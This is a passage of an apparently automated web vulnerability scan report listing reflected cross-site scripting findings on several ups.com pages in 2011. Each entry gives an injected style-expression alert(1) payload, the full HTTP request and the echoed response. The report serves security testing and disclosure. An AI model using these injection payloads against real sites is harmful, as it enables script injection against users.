Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena7ad9"style="x:expression(alert(1))"f95a058444a/locations/store/index.html">
...[SNIP]...

1.348. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af was submitted in the REST URL parameter 2. This input was echoed as ad5e0"style="x:expression(alert(1))"5145468c0af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af/en/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usad5e0"style="x:expression(alert(1))"5145468c0af/en/myups/billing/index.html">
...[SNIP]...

1.349. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a57c4"style%3d"x%3aexpression(alert(1))"88004cee062 was submitted in the REST URL parameter 3. This input was echoed as a57c4"style="x:expression(alert(1))"88004cee062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena57c4"style%3d"x%3aexpression(alert(1))"88004cee062/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena57c4"style="x:expression(alert(1))"88004cee062/myups/billing/index.html">
...[SNIP]...

1.350. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e was submitted in the REST URL parameter 2. This input was echoed as cd044"style="x:expression(alert(1))"8605e8dd69e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/uscd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/uscd044"style="x:expression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html">
...[SNIP]...

1.351. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01d3"style%3d"x%3aexpression(alert(1))"63752b625b4 was submitted in the REST URL parameter 3. This input was echoed as d01d3"style="x:expression(alert(1))"63752b625b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/end01d3"style%3d"x%3aexpression(alert(1))"63752b625b4/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/end01d3"style="x:expression(alert(1))"63752b625b4/myups/mgmt/index.html">
...[SNIP]...

1.352. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac was submitted in the REST URL parameter 2. This input was echoed as ab43b"style="x:expression(alert(1))"d5a4fd981ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac/en/register/help/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32099

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usab43b"style="x:expression(alert(1))"d5a4fd981ac/en/register/help/index.html">
...[SNIP]...

1.353. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f was submitted in the REST URL parameter 3. This input was echoed as 3b516"style="x:expression(alert(1))"bdd9fbd3d6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en3b516"style="x:expression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav">
...[SNIP]...

1.354. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e was submitted in the REST URL parameter 2. This input was echoed as 7ae54"style="x:expression(alert(1))"37c623b859e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35937

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7ae54"style="x:expression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav">
...[SNIP]...

1.355. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea was submitted in the REST URL parameter 3. This input was echoed as f552a"style="x:expression(alert(1))"4ebe5159dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea/register/reasons/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35909

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf552a"style="x:expression(alert(1))"4ebe5159dea/register/reasons/index.html">
...[SNIP]...

1.356. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5693e"style%3d"x%3aexpression(alert(1))"d23773eb856 was submitted in the REST URL parameter 2. This input was echoed as 5693e"style="x:expression(alert(1))"d23773eb856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5693e"style%3d"x%3aexpression(alert(1))"d23773eb856/en/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5693e"style="x:expression(alert(1))"d23773eb856/en/resources/index.html">
...[SNIP]...

1.357. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c78"style%3d"x%3aexpression(alert(1))"8743722626c was submitted in the REST URL parameter 3. This input was echoed as b4c78"style="x:expression(alert(1))"8743722626c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb4c78"style%3d"x%3aexpression(alert(1))"8743722626c/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb4c78"style="x:expression(alert(1))"8743722626c/resources/index.html">
...[SNIP]...

1.358. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295 was submitted in the REST URL parameter 2. This input was echoed as 5b225"style="x:expression(alert(1))"51c06fe1295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295/en/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44746

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5b225"style="x:expression(alert(1))"51c06fe1295/en/resources/pay/index.html">
...[SNIP]...

1.359. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c was submitted in the REST URL parameter 3. This input was echoed as 70de7"style="x:expression(alert(1))"2a2e6173e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en70de7"style="x:expression(alert(1))"2a2e6173e9c/resources/pay/index.html">
...[SNIP]...

1.360. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5219"style%3d"x%3aexpression(alert(1))"8878c7088f8 was submitted in the REST URL parameter 2. This input was echoed as b5219"style="x:expression(alert(1))"8878c7088f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb5219"style%3d"x%3aexpression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb5219"style="x:expression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html">
...[SNIP]...

1.361. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edff4"style%3d"x%3aexpression(alert(1))"804f67be8a3 was submitted in the REST URL parameter 3. This input was echoed as edff4"style="x:expression(alert(1))"804f67be8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enedff4"style%3d"x%3aexpression(alert(1))"804f67be8a3/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enedff4"style="x:expression(alert(1))"804f67be8a3/resources/service/delivery_change.html">
...[SNIP]...

1.362. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8721"style%3d"x%3aexpression(alert(1))"28636025260 was submitted in the REST URL parameter 2. This input was echoed as d8721"style="x:expression(alert(1))"28636025260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd8721"style%3d"x%3aexpression(alert(1))"28636025260/en/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd8721"style="x:expression(alert(1))"28636025260/en/resources/service/index.html">
...[SNIP]...

1.363. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076 was submitted in the REST URL parameter 3. This input was echoed as 13f5b"style="x:expression(alert(1))"13ae836b076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en13f5b"style="x:expression(alert(1))"13ae836b076/resources/service/index.html">
...[SNIP]...

1.364. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/fraud.html

Issue detail

